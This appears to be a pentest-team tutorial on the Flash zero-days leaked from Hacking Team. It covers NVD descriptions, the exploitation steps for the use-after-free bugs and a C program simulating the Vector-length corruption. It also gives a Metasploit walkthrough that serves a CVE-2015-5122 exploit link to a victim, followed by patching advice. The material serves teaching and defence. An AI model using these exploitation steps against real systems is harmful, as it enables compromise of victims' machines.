Hacking Team is a Milan-based information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations. Its "Remote Control System" (RCS) lets customers monitor the communications of internet users, decrypt their encrypted files and emails, record Skype and other Voice over IP calls, and remotely activate the microphone and camera on target computers. Hacking Team states that it can disable its software if it is used unethically.
The recent cyber attack that exposed 400 GB of Hacking Team's data included the following zero-day vulnerabilities in Adobe Flash Player.
Let us look in detail at how these vulnerabilities affect Adobe Flash Player.
The first, CVE-2015-5119, is the Flash bug described in Hacking Team's internal notes as the "most beautiful Flash bug for the last four years". The NVD entry reads:
Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The second critical zero-day in Adobe Flash, CVE-2015-5122, is also a use-after-free programming flaw and is similar to CVE-2015-5119:
Use-after-free vulnerability in the DisplayObject class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.302 on Windows and OS X, 14.x through 18.0.0.203 on Windows and OS X, 11.x through 11.2.202.481 on Linux, and 12.x through 18.0.0.204 on Linux Chrome installations allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that leverages improper handling of the opaqueBackground property, as exploited in the wild in July 2015.
“Successful exploitation [of CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,” Adobe said.
Adobe credited FireEye researcher Dhanesh Kizhakkinan with reporting the vulnerability, which was found in the stolen data leaked from Hacking Team.
The flaw is triggered by freeing a TextLine object from inside the valueOf function of a custom class while that object's opaqueBackground property is being set. As FireEye researchers explained:
“Once the TextLine object is freed, a Vector object is allocated in its place. Returning from valueOf will overwrite the length field of Vector object with a value of 106. (Initial length is 98).
Exploitation continues by finding the corrupted Vector object by its length, which will be greater than 100.
This enables the object to change an adjacent Vector object’s length to 0x40000000.
Once exploit achieves this, it follows the same mechanism that was used in CVE-2015-5119 PoC.”
This, in turn, lets the attacker run shellcode; the leaked proof of concept simply pops up a calculator.
The third zero-day found in the leak, CVE-2015-5123, follows the same valueOf pattern in a different class:
Use-after-free vulnerability in the BitmapData class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.302 on Windows and OS X, 14.x through 18.0.0.203 on Windows and OS X, 11.x through 11.2.202.481 on Linux, and 12.x through 18.0.0.204 on Linux Chrome installations allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The vulnerability can be triggered by the following steps:
1) Create a new BitmapData object, prepare two Array objects and two MyClass objects, and assign a MyClass object to each Array.
2) MyClass overrides valueOf. BitmapData.paletteMap is then called with the two Arrays as parameters; while coercing the Array elements to numbers, paletteMap calls MyClass.valueOf.
3) Inside valueOf, BitmapData.dispose() is called to free the underlying memory of the BitmapData object. paletteMap then continues working on the freed memory, which crashes Flash Player, or, if the attacker reallocates that memory with controlled data first, leads to code execution.
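The pattern behind CVE-2015-5122 and the BitmapData steps above is the same: a native operation fetches a pointer to an object, hands control to script-controlled valueOf, and keeps using the pointer after the script has freed the object. The following C model is an added example (not Hacking Team's, FireEye's or Rapid7's code) that reproduces the TextLine/opaqueBackground case end to end: the freed slot is reused by a Vector, the deferred store turns into the inflated length (98 to 106 in the real exploit), the exploit finds that Vector by its length and uses it to set the neighbour's length to 0x40000000. A fixed-size slab allocator stands in for the Flash heap so the reuse is deterministic; all names, sizes and the refcount-based hardened setter are illustrative assumptions, not the Flash runtime's internals.

```c
/*
 * Added example (not Hacking Team's, FireEye's or Rapid7's code): a C model
 * of the valueOf-triggered use-after-free behind CVE-2015-5122 and the
 * BitmapData variant. A tiny fixed-size slab allocator stands in for the
 * Flash heap so that the freed slot is reused deterministically; names and
 * sizes are chosen for illustration, not taken from the Flash runtime.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SLOT_SIZE 32          /* one size class shared by TextLine and Vector */
#define NSLOTS    8
#define NSPRAY    3

static _Alignas(8) uint8_t slab[NSLOTS * SLOT_SIZE];
static int free_stack[NSLOTS];
static int free_top;

static void slab_reset(void) {
    memset(slab, 0, sizeof slab);
    free_top = 0;
    for (int i = NSLOTS - 1; i >= 0; i--)   /* push 7..0 so slot 0 is handed out first */
        free_stack[free_top++] = i;
}
static void *slab_alloc(void) { return free_top ? slab + free_stack[--free_top] * SLOT_SIZE : NULL; }
static void slab_free(void *p) { free_stack[free_top++] = (int)(((uint8_t *)p - slab) / SLOT_SIZE); }

/* Model of a TextLine: refcount, then the property the setter writes. */
typedef struct { uint32_t refs; uint32_t opaque_background; } TextLine;
/* Model of an AS3 Vector.<uint>: refcount, length header, then elements.
 * Its length sits at the same offset as TextLine.opaque_background. */
typedef struct { uint32_t refs; uint32_t length; uint32_t data[6]; } Vector;

/* Element index that, once length is inflated, reaches the length field of
 * the Vector in the next slab slot: (32 + 4 - 8) / 4 == 7. */
#define ADJ_LENGTH_INDEX ((SLOT_SIZE + offsetof(Vector, length) - offsetof(Vector, data)) / 4)

static void textline_release(TextLine *tl) { if (--tl->refs == 0) slab_free(tl); }

/* Element store guarded only by the length header, as the engine's is. */
static bool vector_set(Vector *v, uint32_t idx, uint32_t val) {
    if (idx >= v->length) return false;
    memcpy((uint8_t *)v + offsetof(Vector, data) + (size_t)idx * 4, &val, 4);
    return true;
}

typedef uint32_t (*value_of_fn)(void *ctx);

/* Vulnerable setter: coerce the assigned value (runs script-controlled
 * valueOf), then store into the TextLine pointer fetched before the call. */
static void set_opaque_background_vuln(TextLine *tl, value_of_fn value_of, void *ctx) {
    uint32_t v = value_of(ctx);       /* script may free tl in here */
    tl->opaque_background = v;        /* write lands in whatever now owns the slot */
}

/* Hardened setter (assumed fix): hold a reference across the callback so a
 * release inside valueOf cannot free the object before the store. */
static void set_opaque_background_fixed(TextLine *tl, value_of_fn value_of, void *ctx) {
    tl->refs++;
    uint32_t v = value_of(ctx);
    tl->opaque_background = v;
    textline_release(tl);             /* deferred free happens after the store */
}

typedef struct { TextLine *victim; Vector *spray[NSPRAY]; } AttackCtx;

/* Attacker-controlled valueOf: drop the TextLine's last reference, allocate
 * Vectors so one lands in the freed slot, and return an oversized length. */
static uint32_t evil_value_of(void *p) {
    AttackCtx *a = p;
    textline_release(a->victim);
    for (int i = 0; i < NSPRAY; i++) {
        a->spray[i] = slab_alloc();
        a->spray[i]->refs = 1;
        a->spray[i]->length = 6;
    }
    return 106;   /* stored as "opaqueBackground"; becomes Vector.length if aliased */
}

/* Runs the attack against either setter and returns the length of the Vector
 * adjacent to the corrupted one: 0x40000000 if the write succeeded, 6 if no
 * Vector was corrupted. */
static uint32_t run_attack(bool hardened) {
    slab_reset();
    TextLine *victim = slab_alloc();
    victim->refs = 1;
    victim->opaque_background = 0;
    AttackCtx a = { .victim = victim, .spray = {0} };

    if (hardened) set_opaque_background_fixed(victim, evil_value_of, &a);
    else          set_opaque_background_vuln(victim, evil_value_of, &a);

    /* Step 2 of the exploit: find the corrupted Vector by its length. */
    Vector *corrupted = NULL;
    for (int i = 0; i < NSPRAY; i++)
        if (a.spray[i]->length > 100) corrupted = a.spray[i];
    if (!corrupted) return a.spray[1]->length;

    /* Step 3: the inflated length lets an "in-bounds" store reach the next
     * slot's length field; a 0x40000000-element Vector then reads and
     * writes anywhere in the process. */
    vector_set(corrupted, ADJ_LENGTH_INDEX, 0x40000000u);
    return a.spray[1]->length;
}

int main(void) {
    printf("vulnerable setter: adjacent Vector length = 0x%x\n", run_attack(false));
    printf("hardened setter:   adjacent Vector length = 0x%x\n", run_attack(true));
    return 0;
}
```

Running it prints 0x40000000 for the vulnerable setter and 0x6 for the hardened one. The only difference between the two setters is that the hardened version keeps the object alive across the callback; that is the general rule for any native code that invokes script while holding a raw pointer, whether the script hook is valueOf, toString or a property getter.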
Steps to exploit flash zero day vulnerability with metasploit :
Note: This tutorial is for informational purposes only.
- First, download the exploit code. Rapid7's Metasploit repository carries it here (this directory holds the exploit's data files; the Ruby module itself is under modules/exploits/ in the same repository and needs these data files in place):
https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5122
Figure 2:Download the Exploit
- Create an empty document, paste the exploit code into it, and save it on the desktop as Adobe_Flash_HackingTeam_exploit.rb.
- Then add it to the Metasploit modules directory. Use the following command to move the file from /root/Desktop into the Metasploit framework modules folder (create the flash folder if it does not exist yet):
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/
Figure 3: Move the Exploit in exploit-Modules
- You can use the following command to check that the file actually landed in the destination folder:
ls -l /usr/share/metasploit-framework/modules/exploits/windows/flash/
Figure 4: Confirm the destination folder
- Open a new terminal, start the services Metasploit depends on (if they are not already running) and launch msfconsole. On newer Kali releases there is no metasploit service; run msfdb init once instead of the second command:
service postgresql start
service metasploit start
msfconsole
Figure 5: Start msfconsole
- Now that Metasploit is running with our newly imported exploit, search for it by name (the search matches the module's path, so any part of the file name works):
search flash
After this, use the newly added module by the path it was loaded under (its location relative to the modules directory, without the .rb extension):
use exploit/windows/flash/Adobe_Flash_HackingTeam_exploit
Let's check the options for the CVE-2015-5122 module with the following command:
show options
- We will keep the default options and type "exploit" to trigger our exploit. Note the URL the module prints; that is the link the victim must open:
exploit
- Let's open the link from a Windows 7 virtual machine with a vulnerable browser (Firefox) and a vulnerable version of Flash Player (older than 18.0.0.209, the release that fixed CVE-2015-5122) installed.
Figure 7: Send the Link to the victim
How to avoid getting infected by these exploits:
– Update Flash Player and make sure that it is up to date: https://get.adobe.com/flashplayer/ (Flash Player reached end of life on 31 December 2020; today the right move is to uninstall it rather than update it.)
If you're unsure whether your browser has Flash installed or which version it is running, you can browse to this link: https://www.adobe.com/software/flash/about/
– Install security patches as they are released and keep your OS updated.
– Keep your browser updated.
Attack & PenTest Team,